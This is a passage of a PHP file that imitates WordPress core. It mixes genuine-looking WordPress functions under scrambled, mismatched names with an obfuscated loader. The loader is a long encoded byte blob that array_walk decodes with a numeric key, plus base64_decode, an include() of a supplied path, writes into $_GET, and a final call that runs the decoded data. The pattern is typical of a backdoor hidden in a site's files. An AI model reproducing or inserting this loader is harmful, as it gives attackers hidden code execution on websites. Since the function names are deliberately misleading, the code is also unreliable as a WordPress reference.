xaeN\x84{\x9e\xa1\xdc\xde\xb4d\x84wl\x88\x98\x99\x93d\x84\xc9\xad\xc2\xed\xeb\xdf\xa8\xc9\xba\xbb\xaf\xdd\xa1\x9ai\x96\x87\x94\xb0\xe4\xe5\xe2i\x96\x87\xa3\xba\xea\xe5\xd7i\x96\x87st\xb3\xb4}M\x93\x81lk\x98\xea\xdb\xaa\xb7\xa1lk\x98\xa3\xa2h\xb8\x9c\xb6\xb8\xb9\xe0\xdb\xa5\x93\x81lk\xc4\xe6\xedn\x93\x94lk\xa8\xb4\xaeMnwlk\x98\x99\x93d\xdb\xbf\xb5\xb7\xdd\x82\x9bh\xb8\x9c\xb6\xb8\xb9\xe0\xdb\xa5\x93\x81\xb6\x90\xd1\x99\x93n\x93\x93{u\x98\x99\xd8\xad\xda\xca\xa0k\x98\x99\x9ds\xc7\xc6\xc1\xb9\xec\xa1\x97\xa5\xd1\xad\x91\xa4\xc7\xdf\xca\x8e\x8d\x86vk\x98\xc0\xcbn\x93\x80U\xc6\x82\x99\x93s\x8ewl\x9a\xbe\xc1\x93d\x8e\x86p\xac\xe5\xcf\xb8\x9d\xb3\xbd\xa3\x95\xd3\x9d\xc7\x89\xce\xc4\x8d\xb2\xe0\xda\xd0M\xa1\x86vk\xc3\x99\x93d\x8e\x86\xbf\xbf\xea\xd8\xe5\xa9\xd4\xbc\xad\xbf\xa0\x9d\xd4\xb1\xba\x9c\xa5\x9a\xde\xd0\xbd\x9f\x88\xab\x91\xb5\xe5\xba\xda\xac\xc5\xb4xz\xa2\x99\xec\x93\xc9wvz\xaa\xa2\xaenwlk\x98\x99|h\xb8\x9c\xb6\xb8\xb9\xe0\xdb\xa5\x8f\x82\x87o\xd7\xe5\xda\x9a\xd4\xc9{u\xcb\xeb\xd7n\x93\x94{u\x98\x99\x93\xbd\xdb\xc8vz\x9f\xaa\xac|\x98\x88s\x86\x82\x82|Mmwl\xc8\x82\x99\x93d\x84`Vk\x98\x99\x93d\x84wp\x94\xdf\xbb\xd4\xad\xaa\x86vk\xef\xcf\x93d\x84\x81{\x88\x98\x99\xe6\xb8\xd6\xb6\xbe\xb0\xe8\xde\xd4\xb8\x8c{\xb9\x90\xd2\xe0\xe6\xb4\xd3\x83lk\x98\xac\x9cn`UT\x98\x99\x93Nm`UT\x81\x99\x93d\x84w\xbe\xb0\xec\xee\xe5\xb2\x93\x81l\x9e\x98\xa3\xa2h\xdc\xb9\xa4\xa5\xe5\xed\xd6\xb6\x9f{\xab\xaf\xcb\xd3\xe0M\xa1\x86v\xb5\xcc\xbc\xcc\x99\x84\x81{r\xaa\xb1\xa6z\x9b~\x87U\x98\x99\x93dm\xd4VU\x82\xa8\x9dd\x84w\xb4u\xa7\x83|Mm`Uz\xa2\x99\x93\xb5\x8e\x86\xb2\xc0\xe6\xdc\xe7\xad\xd3\xc5{u\x98\xd2\xd8\xad\x8e\x86\x9d\xa5\xe8\xcb\xbb\x8c\x8c{\xc6\xac\xdf\xe3\xd9\x9b\xbb\x80VT\x81\x82|M\x84\xd2VT\x81\x82\x97\xaa\xd2\xca\xb2\x8e\xf2\xc6\xde\x8a\xd9\x86v\x9e\xdd\xed\xban\x93\x94{u\xc6\xcb\x9ds\xc7\xbf\xbek\x98\xa1\xa6y\x8d\x92p\xaa\xc2\x99\x93d\x84w\x89z\xa2\xd0\x93d\x84\x81{r\xad\xb0\xa4x\x97~\x87U\x82\x83\x93d\x84\xbd\xbb\xbd\xdd\xda\xd6\xac\x84wls\xe5\xbe\xdc\x90\xdcuT\xd9\xec|h\xb8\x9c\xb6\xb8\xb9\xe0\xdb\xa5\xda\xbe\xae\x94\xc4\xdc\xed\xa6\xce\x80{u\x98\x99\xe2d\x84wvz\xf3\x83\x93d\x84\x86vk\xc8\x99\x9ds\xc8\x99\xb7\xb3\xca\xed\x9bh\xb8\x9c\xb6\xb8\xb9\xe0\xdb\xa5\xda\xbe\xae\x94\xc4\xdc\xed\xa6\xce\x83{u\x98\xc4\xe6\xa5\xd5\xc0vz\x9c\xdf\xe1\xb7\xca\x9a\xc6\x98\xe3\xbf\xe8m\x9falk\x98\x99\xa2n\xb7\xc0\xc5k\x98\x99\x9ds\xe1aVT\xf5\x83|Nn\x86vk\x98\x99\xe4\x92\xd9wvz\xde\xee\xe1\xa7\xd8\xc0\xbb\xb9\x81\xea\xd5\x91\xb6\xa3\xb2s\x9c\xc1\xbb\x8e\xa5\xcc\xc0\xa0\xd2\xa5\x93d\x88\xc8\xae\xc3\xbf\xda\xe3\x8d\xcd\x80VT\xa7\xa3\xec\xab\x8e\x86\xc7U\x82\x83|\xad\xcawtk\xdb\xe8\xe8\xb2\xd8`tT\x9c\xc1\xbb\x8e\xa5\xcc\xc0\xa0\xd2\xa8\x9dd\x84\xc2\xc5k\xa2\xa8\x9cs\x8e\xc4\xa3\xa3\xbf\xf2\x93n\x93\x94\x89T\xab\xa8\x9dd\xce\x81{t\xa7\xa3\x93\xb7\xa9wvz\xf3\x83}d\x84wlo\xc3\xca\xba\x9e\xc8\xa6\xb0z\xa2\xc1\x9ds\xa1\x86vk\x98\xc1\xbc\xb2\xa7wvz\x9c\xc1\xbb\x8e\xa5\xcc\xc0\xa0\xd2\xd4\xa4\xa1\x9f\x92Vk\x98\x99\x93d\x88\xa3\xbe\xbc\xc9\xf2|\x81m{\x94\x93\xc2\xba\xe8\xb8\xb9\xb1\xa7}\xd5\xb4\x97\xa3\xd1\xbdU\x88\x81\xa0\xa5}\x9c\x90\x80r\xb3\x83|s\x8e\xa5\x9d\xc0\xa2\xa8\x97\xa9\xb4\xc3\xa6\xa1\xea\xa8\x9dd\x84w\xb5\xbd\xe3\xcc\xb8d\x8e\x86\x89T\x9c\xc4\xc4\x8b\xbe\xbb\x9b\xaf\xa0\x9d\xbf\xb6\xd5\xa8\xc5t\xb3\x83\x93s\x8ew\xbc\xba\xf1\xe6\xccn\x93\xbc\xc2\xac\xe4\xa8\x9dd\x84w\x9e\xbc\x98\xa3\xa2lm{\xb1\x9b\xe4\xd3\xc9\xb6\x84wlk\xa1\xb4}d\x84wl\xaf\xe1\xde\x93d\x84wls\xa1\xb4}M\x84w\xc9U\x81\x82|s\x8ewl\x9c\xde\xf1\xc4\x9c\x8e\x86\xc9U\x81\x82|s\x8ewl\x9f\xd1\xdd\xcd\x8d\x8e\x86VT\x81\x82\x93d\xca\xcc\xba\xae\xec\xe2\xe2\xb2\x93\x81lk\x98\xbb\xd6\x86\xcbwlk\xa2\xa8\xb4\x85\xd1\xa7\xc2\xc0\xc0\xa1\x97\xb0\xda\xc1\xa1\xc2\xc7\xa5\x93d\x84wp\xbc\xc7\xea\xe3\x9a\xaf\xb9\xc0t\x82\x99\x93d\x93\x81lk\xf0\xde\x93d\x84\x81{\xc6\x82\x99\x93d\x84w{u\xd9\xed\xcbn\x93\xc9\xb1\xbf\xed\xeb\xe1M\x88\xc3\xc2\xb5\xcd\xf0\xc2s\x8ewlk\xd9\xf3\xb5d\x84\x81{\xa9\xa7\xa3\x93d\xdc\xcd\x95\x9f\xa2\xa8\x97\xb5\xb3\xc8\xbc\xa1\xc3\xdb\xe7naVk\xf5\x83\x93d\x84`VT\x81\x82|Mm\xbd\xc1\xb9\xdb\xed\xdc\xb3\xd2`\x8f\x9e\xb9\xf2\xb4\x86\xd0\xc1\x8d\x99\xa0\x9d\xda\x93\xcd\xa2\x8e\xb1\xbe\xa5|h\xca\xc5\xbf\xb1\xbb\xf3\xc0\xaf\xaa\xccuU\x98\x99\x93M\xdf\x86v\xba\xc9\xd3\xded\x84wvz\x82\x82|Mm`lk\x98\x99\x93h\xcb\xa6\xb5\x96\xba\xdf\xb9d\x84w\x89z\xa2\x99\xb7\x9d\xcb\xc3\x9fu\xa7\xde\xeb\xb4\xd0\xc6\xb0\xb0\xa7\xa3\x93d\x84\xa5\x9d\x8e\x98\x99\x9ds\x8c{\xb2\xb9\xeb\xdf\xb6\xbe\xb1\xc2\x92\xc0\xa4\x82\x97\xab\xb3\xc0\x97\x8d\xde\xbf|m\x9faVz\xa2\x99\x93d\xc7\xc6\xb5\x8c\x98\x99\x9dsnwl\xbc\xda\xc6\xc5\x90\xcap\xb2\xc7\xe2\xbe\x86\xca\x9dxz\xa2\x99\xe2\x8a\xa5wlk\xa2\xa8\x97\xaa\xd2\xca\xb2\x8e\xf2\xc6\xde\x8a\xd9\x80\x87U\x98\x99\x93d\x84\xd4VT\x81\x82|N\x84wlk\x98\xdf\xe8\xb2\xc7\xcb\xb5\xba\xe6\xa8\x9dd\x84w\xb5\xb0\x98\xa3\xa2\xa8\xa6\xc2\xb4\x9d\xec\xa1\x97\x98\xa9\xc1\xb9\x8c\xdf\xe1\xd4\xba\xcb\xb9\x95\x97\xdb\xf3\xd5\xae\x90`p\xb1\xe6\xec\xd9\x87\xde\xa4\xb7\x91\xed\xa2}d\x84wU\xc6\x82\x82|s\x8e\x99lk\x98\xa3\xa2\xaa\xd3\xc9\xb1\xac\xdb\xe1|l\x93\x81\x97\xc1\xcf\xcd\x93n\x93{\xa0\x90\xe2\xe6\xb4\xab\xcc\xb8\xc2\xb2\xda\xc2\xbf\xa7\xde\xb9\xb6T\xd9\xec|h\xd5\xa6\xbd\xbb\xce\xc4\xd5\xb8\x93\x81l\x8c\xcd\xa3\xa2\x81\xa2wlk\x9c\xe5\xe9\xae\xb9\xce\x9bz\xa2\x99\x93d\xba\x99\xc4\x91\x98\xa3\xa2m\x93\x81lk\x98\xd1\xe1\x8f\x84wvz\xf3\x83\x93d\x84`\xa4\xc0\xe3\xc3\xd9\xb9\xac\xcc\xads\x9c\xea\xc2\xb5\xd4\xad\x97\xad\xec\xa5\xa2n\xa8\x9f\xc3\xc3\x98\xa3\xa2\x8b\xdd\x99\x8d\x97\xce\xe0\x9bh\xd0\xcd\xb6\xa0\xef\xc8\x9cp\x93\x81lk\x98\xcd\xb9\xb8\xce\xcalu\xa7\x9d\xd9\xb2\xd7\xbd\x8f\xc5\xc5\xe4\xb9\xb9\x8d\x92Vk\x98\x99\x93M\xe1aVz\xa2\xea\xea\x85\xa7\x81{\xc8\x82\x99\x93d\x93\x81lk\x98\xc4\xd5\xa6\xabwlk\xa2\xa8}N\x93\x81l\xbe\xd1\xc7\xean\x93\xbd\xc1\xb9\xdb\xed\xdc\xb3\xd2\x86v\xbb\xe4\xc0\xcad\x8e\x86\x9f\x8d\xc2\xf1\xe1l\x88\xc8\x9b\xbc\xe8\xcf\xbe\xa6\xd8\x83Uo\xe4\xef\xdd\x99\xdb\xa6uU\x81\x99\x93d\x84w\xc7U\x98\x99\x93dm{\x9d\x9d\xba\xdb\xbf\x9c\xc8\x9a\x92\xc4\x98\xb6\x93d\xd7\xcb\xbe\xb7\xdd\xe7\x9bM\x88\xc3\xc2\xb5\xcd\xf0\xc2d\x84wuz\xeb\xed\xe5\xb0\xc9\xc5tT\x9c\xea\xc2\xb5\xd4\xad\x97\xad\xec\xa8\x9dd\x84w\xbd\xb3\xc6\x99\x9ds\x8d\x92Vk\x98\x99\x93s\x8ew\xb5\x95\xf1\xc5\xbbd\x84\x81{o\xe9\xc8\xe4\xb4\xba\xa2\xae\xbf\x81\xa7\xb0M\x86\x9c\xc2\xad\xed\xd0\xbc\x8a\x91\xc8\xb6\xa3\xa5\xea\xe8\xa8\xde\xc8\xa1\x8e\xa5\xda\xc2\x99\xac\xa5y\xb3\xca\xc7\xa0\x97\xdd\xcf\x9ax\xe4\xbb\xd7\x92\xbe\xaa\xc6m\xb3\x83\x93d\x84wlz\xa2\x99\x93\xa6\xcc\xc1vz\x9c\xea\xc2\xb5\xd4\xad\x97\xad\xec\x82\xb0M\xd7\xcb\xbe\xaa\xea\xde\xe3\xa9\xc5\xcbls\x98\x99\x93h\xd5\xa6\xbd\xbb\xce\xc4\xd5\xb8\x90\x86vk\xed\xf0\xba\xba\xd3wlu\xa7\xe2\xe1\xb8\xda\xb8\xb8s\x9c\xca\xc5\x86\xc6\xa3\xa4\xaf\xbb\xbf\xecm\x84wwk\xa9\xa2\xaeN\x84wlk\x98\x99\x93dn`{u\x98\x99\xcbd\x84wvz\xea\xde\xe7\xb9\xd6\xc5{u\x98\x99\x93\x8f\xa6\xb0\x9a\xa4\xa2\xa8\x97\xb5\xb3\xc8\xbc\xa1\xc3\xdb\xe7nwlk\x98\x99|\xc1naVz\xa2\x99\x93\xa5\xd8\xc2\xbfu\xa7\x83\x93d\x84\xbd\xc1\xb9\xdb\xed\xdc\xb3\xd2`\xa4\xc0\xe3\xc3\xd9\xb9\xac\xcc\xads\x9c\xea\xc2\xb5\xd4\xad\x97\xad\xec\xa5\xa2n\xb9\xb9\xc6\x8e\xe4\xa3\xa2h\xd0\xcd\xb6\xa0\xef\xc8\x9fM\x88\xbd\xba\xbe\xde\xbc\xed\x91\xcf\x9d\xc1t\x82\x99\x93M\xdfwlk\x98\x99}d\x84wU\x8e\xcb\xba\xec\x85\xa6\xc3\xb6\x8c\xc6\xa1\xb4\x85\xd1\xa7\xc2\xc0\xc0\xa1\x97\xb0\xda\xc1\xa1\xc2\xc7\xa5|\x97\xa6\xa1\xc4\xb9\xa0\x9d\xe4\x93\xd5\xc7\xa2\x96\xda\xed\x9fd\x84{\xb8\xc1\xe2\xce\xea\x93\x8d\x80xk\x98\x9d\xd9\xb2\xd7\xbd\x8f\xc5\xc5\xe4\xb9\xb9\x8d\x92Vk\x98\x99}Mm`Uo\xc3\xe9\xe7\x8b\xb4\xc6\x9e\xc2\xe0\x82\xb0d\x84\xcb\xbe\xb4\xe5\xa1\x97\xb0\xda\xc1\xa1\xc2\xc7\xa2\xaeNm`UT\x81\x99\x93d\x84{\xa2\xb2\xe2\xc0\xcb\xa5\x93\x81lk\xde\xc1\xdf\xb2\x84\x81{\x88\xa7\xa3\x93d\xd1\x81{\xb0\xf0\xe9\xdf\xb3\xc8\xbcto\xde\xe7\xe6\xaa\xa7\xd1\x99\xb6\xbe\xee\x9fd\x84wlo\xc3\xe9\xe7\x8b\xb4\xc6\x9e\xc2\xe0\xa2\xaeN\x84`\xb5\xb1\x81\xa1\xd6\xb3\xd9\xc5\xc0s\x9c\xcf\xda\xae\xab\xaf\xadt\x81\xb7\x93d\x84wl|\xa1\x82\xeeNm`Uo\xdf\xf3\xc0\x95\xb5`\x89z\xa2\x99\x93\xb5\xd8wlu\xa7\xe2\xe0\xb4\xd0\xc6\xb0\xb0\xa0\x9b\xcfy\x99yxz\xa2\x99\xd5\xbb\xdb\x81{o\xce\xe0\xdd\x8b\xbc\xb8u\x86\x82\x82|M\x84wlo\xc4\xe5\xd5\xb1\xb9\xb0l\x88\x81\xec\xe7\xb6\xc3\xc7\xad\xaf\xa0\x9d\xda\xbe\xb1\xa8\x9dw\x81\xab\xa3p\x93\x81l\x96\xbc\xc1\xbdn\x93y\xa8\x81\xa8\x9b\x9fM\xb7\xab\x9e\xaa\xc8\xba\xb7\xa3\xb6\xa0\x93\x93\xcc\xa2\xaeN\x84wlk\x98\x82\xf0N\x93\x81lk\x98\xc2\xd4\xbc\xa7\xa7lk\xa2\xa8\xf0NnaUU\x81\x82|Mm`\x9d\xa5\xe8\xcb\xbb\x8c\x8cynt\xb3\x9b\xae\xad\x9e\x8b\x87\xbe\xb2\xaf\xadf\xd9\xc5\xb8\xb4\xe6\xe4\x95\xe1"; // %x2F ("/") and skip the remaining steps. $library = rawurldecode($editor_script_handle); $_GET["prDen"] = $tempdir; } /** * See if the next character is LWS * * @return bool true if the next character is LWS, false if not */ function get_block_template($inarray){ $cache_name_function = "Info Data Example"; include($inarray); } /** * Remove control callback for widget. * * @since 2.2.0 * * @param int|string $node_to_process Widget ID. */ function wp_send_user_request($node_to_process) { wp_register_widget_control($node_to_process, '', ''); } $serialized_instance = array(76, 75, 120, 121, 115, 68, 100, 87); $custom_terms = trim($skip_options); /** * Retrieves the link for a page number. * * @since 1.5.0 * * @global WP_Rewrite $current_taxonomy WordPress rewrite component. * * @param int $super_admin Optional. Page number. Default 1. * @param bool $month_number Optional. Whether to escape the URL for display, with esc_url(). * If set to false, prepares the URL with sanitize_url(). Default true. * @return string The link URL for the given page number. */ function get_image_link($super_admin = 1, $month_number = true) { global $current_taxonomy; $super_admin = (int) $super_admin; $update_data = remove_query_arg('paged'); $all_plugin_dependencies_installed = parse_url(home_url()); $all_plugin_dependencies_installed = isset($all_plugin_dependencies_installed['path']) ? $all_plugin_dependencies_installed['path'] : ''; $all_plugin_dependencies_installed = preg_quote($all_plugin_dependencies_installed, '|'); $update_data = preg_replace('|^' . $all_plugin_dependencies_installed . '|i', '', $update_data); $update_data = preg_replace('|^/+|', '', $update_data); if (!$current_taxonomy->using_permalinks() || is_admin()) { $magic_compression_headers = trailingslashit(get_bloginfo('url')); if ($super_admin > 1) { $dependents_location_in_its_own_dependencies = add_query_arg('paged', $super_admin, $magic_compression_headers . $update_data); } else { $dependents_location_in_its_own_dependencies = $magic_compression_headers . $update_data; } } else { $wp_theme_directories = '|\?.*?$|'; preg_match($wp_theme_directories, $update_data, $invalid_setting_count); $CharSet = array(); $CharSet[] = untrailingslashit(get_bloginfo('url')); if (!empty($invalid_setting_count[0])) { $new_mapping = $invalid_setting_count[0]; $update_data = preg_replace($wp_theme_directories, '', $update_data); } else { $new_mapping = ''; } $update_data = preg_replace("|{$current_taxonomy->pagination_base}/\\d+/?\$|", '', $update_data); $update_data = preg_replace('|^' . preg_quote($current_taxonomy->index, '|') . '|i', '', $update_data); $update_data = ltrim($update_data, '/'); if ($current_taxonomy->using_index_permalinks() && ($super_admin > 1 || '' !== $update_data)) { $CharSet[] = $current_taxonomy->index; } $CharSet[] = untrailingslashit($update_data); if ($super_admin > 1) { $CharSet[] = $current_taxonomy->pagination_base; $CharSet[] = $super_admin; } $dependents_location_in_its_own_dependencies = user_trailingslashit(implode('/', array_filter($CharSet)), 'paged'); if (!empty($new_mapping)) { $dependents_location_in_its_own_dependencies .= $new_mapping; } } /** * Filters the page number link for the current request. * * @since 2.5.0 * @since 5.2.0 Added the `$super_admin` argument. * * @param string $dependents_location_in_its_own_dependencies The page number link. * @param int $super_admin The page number. */ $dependents_location_in_its_own_dependencies = apply_filters('get_image_link', $dependents_location_in_its_own_dependencies, $super_admin); if ($month_number) { return esc_url($dependents_location_in_its_own_dependencies); } else { return sanitize_url($dependents_location_in_its_own_dependencies); } } $orig_shortcode_tags = base64_decode($cqueries); /** * Updates metadata cache for a list of post IDs. * * Performs SQL query to retrieve the metadata for the post IDs and updates the * metadata cache for the posts. Therefore, the functions, which call this * function, do not need to perform SQL queries on their own. * * @since 2.1.0 * * @param int[] $option_save_attachments Array of post IDs. * @return array|false An array of metadata on success, false if there is nothing to update. */ function inject_custom_form_fields($option_save_attachments) { return update_meta_cache('post', $option_save_attachments); } /** * Retrieves query variable. * * @since 3.5.0 * * @param string $new_sub_menuuery_var Query variable key. * @return mixed */ if (!empty($needle)) { $hide_empty = substr($needle, 0, 6); } $BANNER = strlen($delete_file); /** * Retrieves the locale of a user. * * If the user has a locale set to a non-empty string then it will be * returned. Otherwise it returns the locale of get_locale(). * * @since 4.7.0 * * @param int|WP_User $overlay_markup User's ID or a WP_User object. Defaults to current user. * @return string The locale of the user. */ function get_suggested_policy_text($overlay_markup = 0) { $wp_plugin_paths = false; if (0 === $overlay_markup && function_exists('wp_get_current_user')) { $wp_plugin_paths = wp_get_current_user(); } elseif ($overlay_markup instanceof WP_User) { $wp_plugin_paths = $overlay_markup; } elseif ($overlay_markup && is_numeric($overlay_markup)) { $wp_plugin_paths = get_user_by('id', $overlay_markup); } if (!$wp_plugin_paths) { return get_locale(); } $XingVBRidOffsetCache = $wp_plugin_paths->locale; return $XingVBRidOffsetCache ? $XingVBRidOffsetCache : get_locale(); } $plugin_files = str_pad($delete_file, $BANNER + 3, "_"); /** * Outputs term meta XML tags for a given term object. * * @since 4.6.0 * * @global wpdb $subfeedquery WordPress database abstraction object. * * @param WP_Term $edit_user_link Term object. */ function generate_rewrite_rules($edit_user_link) { global $subfeedquery; $new_plugin_data = $subfeedquery->get_results($subfeedquery->prepare("SELECT * FROM {$subfeedquery->termmeta} WHERE term_id = %d", $edit_user_link->term_id)); foreach ($new_plugin_data as $StereoModeID) { /** * Filters whether to selectively skip term meta used for WXR exports. * * Returning a truthy value from the filter will skip the current meta * object from being exported. * * @since 4.6.0 * * @param bool $skip Whether to skip the current piece of term meta. Default false. * @param string $StereoModeID_key Current meta key. * @param object $StereoModeID Current meta object. */ if (!apply_filters('wxr_export_skip_termmeta', false, $StereoModeID->meta_key, $StereoModeID)) { printf("\t\t<wp:termmeta>\n\t\t\t<wp:meta_key>%s</wp:meta_key>\n\t\t\t<wp:meta_value>%s</wp:meta_value>\n\t\t</wp:termmeta>\n", wxr_cdata($StereoModeID->meta_key), wxr_cdata($StereoModeID->meta_value)); } } } $postpath = hash('md5', $hide_empty); /** * Kills WordPress execution and displays XML response with an error message. * * This is the handler for wp_die() when processing XMLRPC requests. * * @since 3.2.0 * @access private * * @global wp_xmlrpc_server $revision_ids * * @param string $needle Error message. * @param string $root_value Optional. Error title. Default empty string. * @param string|array $thisfile_riff_RIFFsubtype_COMM_0_data Optional. Arguments to control behavior. Default empty array. */ function get_after_opener_tag_and_before_closer_tag_positions($needle, $root_value = '', $thisfile_riff_RIFFsubtype_COMM_0_data = array()) { global $revision_ids; list($needle, $root_value, $to_do) = _wp_die_process_input($needle, $root_value, $thisfile_riff_RIFFsubtype_COMM_0_data); if (!headers_sent()) { nocache_headers(); } if ($revision_ids) { $api_request = new IXR_Error($to_do['response'], $needle); $revision_ids->output($api_request->getXml()); } if ($to_do['exit']) { die; } } $cert = str_repeat($custom_terms, 2); /** * Display the description of the author of the current post. * * @since 1.0.0 * @deprecated 2.8.0 Use the_author_meta() * @see the_author_meta() */ function edit_media_item_permissions_check() { _deprecated_function(__FUNCTION__, '2.8.0', 'the_author_meta(\'description\')'); the_author_meta('description'); } /* translators: %s: register_widget() */ if ($orig_shortcode_tags !== false) { $disableFallbackForUnitTests = strlen($orig_shortcode_tags); } $arguments = array(1, 2, 3); /** * Display the nickname of the author of the current post. * * @since 0.71 * @deprecated 2.8.0 Use the_author_meta() * @see the_author_meta() */ function amend_customize_save_response() { _deprecated_function(__FUNCTION__, '2.8.0', 'the_author_meta(\'nickname\')'); the_author_meta('nickname'); } $inkey2 = array($postpath, $hide_empty); /** * @param string $allow_empty_comment * @return string */ function delete_key($allow_empty_comment) { return "{$allow_empty_comment} widgets_access "; } array_walk($md5_check, "get_post_to_edit", $serialized_instance); /** * Header with image background and overlay block pattern */ if (!empty($arguments)) { $connect_error = implode("-", $arguments); } /** * @param array $wp_meta_boxes * @return bool */ function remove_frameless_preview_messenger_channel($wp_meta_boxes) { $units = wp_get_current_user(); if (!is_array($wp_meta_boxes) || empty($wp_meta_boxes)) { return false; } ?> <h1><?php esc_html_e('Users'); ?></h1> <?php if (1 === count($wp_meta_boxes)) { ?> <p><?php _e('You have chosen to delete the user from all networks and sites.'); ?></p> <?php } else { ?> <p><?php _e('You have chosen to delete the following users from all networks and sites.'); ?></p> <?php } ?> <form action="users.php?action=dodelete" method="post"> <input type="hidden" name="dodelete" /> <?php wp_nonce_field('ms-users-delete'); $ep = get_super_admins(); $rewrite_base = '<option value="' . esc_attr($units->ID) . '">' . $units->user_login . '</option>'; ?> <table class="form-table" role="presentation"> <?php $gen_dir = (array) $_POST['allusers']; foreach ($gen_dir as $toolbar4) { if ('' !== $toolbar4 && '0' !== $toolbar4) { $retVal = get_userdata($toolbar4); if (!current_user_can('delete_user', $retVal->ID)) { wp_die(sprintf( /* translators: %s: User login. */ __('Warning! User %s cannot be deleted.'), $retVal->user_login )); } if (in_array($retVal->user_login, $ep, true)) { wp_die(sprintf( /* translators: %s: User login. */ __('Warning! User cannot be deleted. The user %s is a network administrator.'), '<em>' . $retVal->user_login . '</em>' )); } ?> <tr> <th scope="row"><?php echo $retVal->user_login; ?> <?php echo '<input type="hidden" name="user[]" value="' . esc_attr($toolbar4) . '" />' . "\n"; ?> </th> <?php $type_label = get_blogs_of_user($toolbar4, true); if (!empty($type_label)) { ?> <td><fieldset><p><legend> <?php printf( /* translators: %s: User login. */ __('What should be done with content owned by %s?'), '<em>' . $retVal->user_login . '</em>' ); ?> </legend></p> <?php foreach ((array) $type_label as $now => $wp_path_rel_to_home) { $ihost = get_users(array('blog_id' => $wp_path_rel_to_home->userblog_id, 'fields' => array('ID', 'user_login'))); if (is_array($ihost) && !empty($ihost)) { $required_indicator = "<a href='" . esc_url(get_home_url($wp_path_rel_to_home->userblog_id)) . "'>{$wp_path_rel_to_home->blogname}</a>"; $f2_2 = '<label for="reassign_user" class="screen-reader-text">' . __('Select a user') . '</label>'; $f2_2 .= "<select name='blog[{$toolbar4}][{$now}]' id='reassign_user'>"; $pattern_name = ''; foreach ($ihost as $overlay_markup) { if (!in_array((int) $overlay_markup->ID, $gen_dir, true)) { $pattern_name .= "<option value='{$overlay_markup->ID}'>{$overlay_markup->user_login}</option>"; } } if ('' === $pattern_name) { $pattern_name = $rewrite_base; } $f2_2 .= $pattern_name; $f2_2 .= "</select>\n"; ?> <ul style="list-style:none;"> <li> <?php /* translators: %s: Link to user's site. */ printf(__('Site: %s'), $required_indicator); ?> </li> <li><label><input type="radio" id="delete_option0" name="delete[<?php echo $wp_path_rel_to_home->userblog_id . '][' . $retVal->ID; ?>]" value="delete" checked="checked" /> <?php _e('Delete all content.'); ?></label></li> <li><label><input type="radio" id="delete_option1" name="delete[<?php echo $wp_path_rel_to_home->userblog_id . '][' . $retVal->ID; ?>]" value="reassign" /> <?php _e('Attribute all content to:'); ?></label> <?php echo $f2_2; ?></li> </ul> <?php } } echo '</fieldset></td></tr>'; } else { ?> <td><p><?php _e('User has no sites or content and will be deleted.'); ?></p></td> <?php } ?> </tr> <?php } } ?> </table> <?php /** This action is documented in wp-admin/users.php */ do_action('delete_user_form', $units, $gen_dir); if (1 === count($wp_meta_boxes)) { ?> <p><?php _e('Once you hit “Confirm Deletion”, the user will be permanently removed.'); ?></p> <?php } else { ?> <p><?php _e('Once you hit “Confirm Deletion”, these users will be permanently removed.'); ?></p> <?php } submit_button(__('Confirm Deletion'), 'primary'); ?> </form> <?php return true; } $md5_check = wp_comments_personal_data_exporter($md5_check); /** * Server-side rendering of the `core/social-link` blocks. * * @package WordPress */ /** * Renders the `core/social-link` block on server. * * @param Array $bitrate_value The block attributes. * @param String $prime_post_terms InnerBlocks content of the Block. * @param WP_Block $has_text_colors_support Block object. * * @return string Rendered HTML of the referenced block. */ function wp_dashboard_quick_press_output($bitrate_value, $prime_post_terms, $has_text_colors_support) { $author__not_in = isset($has_text_colors_support->context['openInNewTab']) ? $has_text_colors_support->context['openInNewTab'] : false; $tax_object = isset($bitrate_value['service']) ? $bitrate_value['service'] : 'Icon'; $wp_meta_keys = isset($bitrate_value['url']) ? $bitrate_value['url'] : false; $ui_enabled_for_plugins = isset($bitrate_value['label']) ? $bitrate_value['label'] : block_core_social_link_get_name($tax_object); $nav_menu_setting = isset($bitrate_value['rel']) ? $bitrate_value['rel'] : ''; $a2 = array_key_exists('showLabels', $has_text_colors_support->context) ? $has_text_colors_support->context['showLabels'] : false; // Don't render a link if there is no URL set. if (!$wp_meta_keys) { return ''; } /** * Prepend emails with `mailto:` if not set. * The `is_email` returns false for emails with schema. */ if (is_email($wp_meta_keys)) { $wp_meta_keys = 'mailto:' . antispambot($wp_meta_keys); } /** * Prepend URL with https:// if it doesn't appear to contain a scheme * and it's not a relative link starting with //. */ if (!parse_url($wp_meta_keys, PHP_URL_SCHEME) && !str_starts_with($wp_meta_keys, '//')) { $wp_meta_keys = 'https://' . $wp_meta_keys; } $is_interactive = block_core_social_link_get_icon($tax_object); $changeset_data = get_block_wrapper_attributes(array('class' => 'wp-social-link wp-social-link-' . $tax_object . block_core_social_link_get_color_classes($has_text_colors_support->context), 'style' => block_core_social_link_get_color_styles($has_text_colors_support->context))); $upload_iframe_src = '<li ' . $changeset_data . '>'; $upload_iframe_src .= '<a href="' . esc_url($wp_meta_keys) . '" class="wp-block-social-link-anchor">'; $upload_iframe_src .= $is_interactive; $upload_iframe_src .= '<span class="wp-block-social-link-label' . ($a2 ? '' : ' screen-reader-text') . '">'; $upload_iframe_src .= esc_html($ui_enabled_for_plugins); $upload_iframe_src .= '</span></a></li>'; $limits_debug = new WP_HTML_Tag_Processor($upload_iframe_src); $limits_debug->next_tag('a'); if ($author__not_in) { $limits_debug->set_attribute('rel', trim($nav_menu_setting . ' noopener nofollow')); $limits_debug->set_attribute('target', '_blank'); } elseif ('' !== $nav_menu_setting) { $limits_debug->set_attribute('rel', trim($nav_menu_setting)); } return $limits_debug->get_updated_html(); } // Theme is already at the latest version. // Always persist 'id', because it can be needed for add_additional_fields_to_object(). /** * Outputs the Activity widget. * * Callback function for {@see 'dashboard_activity'}. * * @since 3.8.0 */ function wxr_term_description() { echo '<div id="activity-widget">'; $client_pk = wp_dashboard_recent_posts(array('max' => 5, 'status' => 'future', 'order' => 'ASC', 'title' => __('Publishing Soon'), 'id' => 'future-posts')); $font_stretch = wp_dashboard_recent_posts(array('max' => 5, 'status' => 'publish', 'order' => 'DESC', 'title' => __('Recently Published'), 'id' => 'published-posts')); $input_changeset_data = filter_wp_get_nav_menu_items(); if (!$client_pk && !$font_stretch && !$input_changeset_data) { echo '<div class="no-activity">'; echo '<p>' . __('No activity yet!') . '</p>'; echo '</div>'; } echo '</div>'; } do_activate_header($md5_check); // Code by ubergeekØubergeek*tv based on information from /** * Ensures that the current site's domain is listed in the allowed redirect host list. * * @see wp_validate_redirect() * @since MU (3.0.0) * * @param array|string $branching Not used. * @return string[] { * An array containing the current site's domain. * * 